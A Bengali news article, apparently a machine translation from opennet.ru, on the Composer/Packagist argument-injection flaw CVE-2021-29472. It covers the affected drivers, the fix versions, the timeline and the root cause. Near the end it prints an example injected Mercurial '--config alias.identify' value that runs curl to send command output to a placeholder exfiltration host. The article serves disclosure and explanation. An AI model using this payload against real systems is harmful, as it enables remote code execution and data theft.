কম্পোজার প্যাকেজ ম্যানেজারে দুর্বলতা যা প্যাকেজিস্ট পিএইচপি সংগ্রহস্থলের আপস করার অনুমতি দেয়

কম্পোজার ডিপেন্ডেন্সি ম্যানেজারে একটি জটিল দুর্বলতা (CVE-2021-29472) চিহ্নিত করা হয়েছে যা একটি বিশেষভাবে ফরম্যাট করা URL মান সহ একটি প্যাকেজ প্রক্রিয়া করার সময় সিস্টেমে নির্বিচারে আদেশ কার্যকর করার অনুমতি দেয় যা উৎস কোড ডাউনলোড করার ঠিকানা নির্দিষ্ট করে। Git, Subversion, এবং Mercurial সোর্স কন্ট্রোল সিস্টেম ব্যবহার করার সময় ব্যবহৃত GitDriver, SvnDriver এবং HgDriver উপাদানগুলিতে সমস্যাটি ঘটে। কম্পোজার রিলিজ 1.10.22 এবং 2.0.13 এ দুর্বলতা সমাধান করা হয়েছে।

এটি বিশেষভাবে উল্লেখ করা হয়েছে যে সমস্যাটি প্রাথমিকভাবে কম্পোজারের ডিফল্ট প্যাকেজ সংগ্রহস্থল, প্যাকেজিস্টকে প্রভাবিত করেছে, যেটিতে PHP বিকাশকারীদের জন্য 306 প্যাকেজ রয়েছে এবং প্রতি মাসে 1.4 বিলিয়নেরও বেশি ডাউনলোড পরিবেশন করে। পরীক্ষায় দেখা গেছে যে সমস্যা সম্পর্কে জ্ঞান থাকলে, আক্রমণকারীরা প্যাকেজিস্ট অবকাঠামোর নিয়ন্ত্রণ অর্জন করতে পারে এবং রক্ষণাবেক্ষণকারীদের শংসাপত্রগুলিকে আটকাতে পারে বা প্যাকেজ ডাউনলোডগুলিকে একটি তৃতীয় পক্ষের সার্ভারে পুনঃনির্দেশ করতে পারে, ব্যাকডোর প্রতিস্থাপনের জন্য দূষিত পরিবর্তন সহ প্যাকেজ ভেরিয়েন্টের ডেলিভারি সংগঠিত করতে পারে। নির্ভরতা ইনস্টলেশন প্রক্রিয়া চলাকালীন।

শেষ ব্যবহারকারীদের জন্য বিপদ এই সত্যের মধ্যেই সীমাবদ্ধ যে composer.json-এর বিষয়বস্তু সাধারণত ব্যবহারকারী দ্বারা নির্ধারিত হয় এবং তৃতীয় পক্ষের সংগ্রহস্থলগুলিতে অ্যাক্সেস করার সময় উত্স লিঙ্কগুলি প্রেরণ করা হয়, যা সাধারণত বিশ্বাসযোগ্য। প্রধান ধাক্কা Packagist.org সংগ্রহস্থল এবং ব্যক্তিগত প্যাকেজিস্ট পরিষেবার উপর পড়েছে, যা ব্যবহারকারীদের কাছ থেকে প্রাপ্ত ডেটা স্থানান্তর সহ কম্পোজার নামে পরিচিত। আক্রমণকারীরা একটি বিশেষভাবে ডিজাইন করা প্যাকেজ স্থাপন করে প্যাকেজিস্ট সার্ভারে তাদের কোড কার্যকর করতে পারে।

প্যাকেজিস্ট দল দুর্বলতা রিপোর্ট হওয়ার 12 ঘন্টার মধ্যে দুর্বলতা ঠিক করে। গবেষকরা ব্যক্তিগতভাবে প্যাকেজিস্ট বিকাশকারীদের 22 এপ্রিল অবহিত করেছিলেন এবং একই দিনে সমস্যাটি ঠিক করা হয়েছিল। দুর্বলতা মোকাবেলায় সুরকারের একটি সর্বজনীন আপডেট 27 এপ্রিল প্রকাশিত হয়েছিল, 28 এপ্রিল বিশদ বিবরণ সহ প্রকাশিত হয়েছিল। প্যাকেজিস্ট সার্ভারে লগগুলির একটি নিরীক্ষা দুর্বলতার সাথে সম্পর্কিত কোনও সন্দেহজনক কার্যকলাপ প্রকাশ করেনি।

রুট composer.json ফাইল এবং সোর্স ডাউনলোড লিঙ্কে URL যাচাইকরণ কোডে একটি বাগ থাকার কারণে সমস্যাটি হয়েছে। কোডে ত্রুটিটি নভেম্বর 2011 থেকে উপস্থিত রয়েছে। প্যাকেজিস্ট একটি নির্দিষ্ট সোর্স কন্ট্রোল সিস্টেমের সাথে আবদ্ধ না হয়ে কোড লোডিং সংগঠিত করার জন্য বিশেষ স্তরগুলি ব্যবহার করে, যেগুলি "fromShellCommandline" কল করে এবং কমান্ড লাইন আর্গুমেন্ট পাস করে কার্যকর করা হয়। উদাহরণস্বরূপ, গিট-এর জন্য, "git ls-remote -heads $URL" কমান্ডটি বলা হয়, যেখানে URLটিকে "ProcessExecutor::escape($url)" পদ্ধতি ব্যবহার করে প্রসেস করা হয়, সম্ভাব্য বিপজ্জনক নির্মাণ যেমন "$(. ..)" বা "`...`"।

সমস্যার মূল হল ProcessExecutor::escape পদ্ধতিটি “—” ক্রম থেকে এড়িয়ে যায়নি, যা URL-এ কোনো অতিরিক্ত কল প্যারামিটার নির্দিষ্ট করার অনুমতি দেয়। GitDriver.php, SvnDriver.php এবং HgDriver.php ড্রাইভারগুলিতে এই ধরনের পালানো অনুপস্থিত ছিল। GitDriver.php আক্রমণটি এই কারণে বাধাগ্রস্ত হয়েছিল যে "git ls-remote" কমান্ড পাথের পরে অতিরিক্ত আর্গুমেন্ট নির্দিষ্ট করা সমর্থন করে না। HgDriver.php-এ একটি আক্রমণ সম্ভব হয়েছে "--config" প্যারামিটারটি "hq" ইউটিলিটিতে পাস করার মাধ্যমে, যা আপনাকে "alias.identify" সেটিংটি ম্যানিপুলেট করে যেকোন কমান্ডের কার্যকরী সংগঠিত করতে দেয়। উদাহরণস্বরূপ, কার্ল ইউটিলিটি চালানোর মাধ্যমে কোড ডাউনলোড এবং কার্যকর করতে, আপনি নির্দিষ্ট করতে পারেন: —config=alias.identify=!curl http://exfiltration-host.tld —ডেটা “$(ls -alh)”

প্যাকেজিস্টের অনুরূপ ইউআরএল সহ একটি পরীক্ষা প্যাকেজ পোস্ট করে, গবেষকরা যাচাই করেছেন যে পোস্ট করার পরে, তাদের সার্ভার AWS-এর প্যাকেজিস্ট সার্ভারগুলির একটি থেকে একটি HTTP অনুরোধ পেয়েছে যেখানে বর্তমান ডিরেক্টরিতে ফাইলগুলির একটি তালিকা রয়েছে৷

উত্স: opennet.ru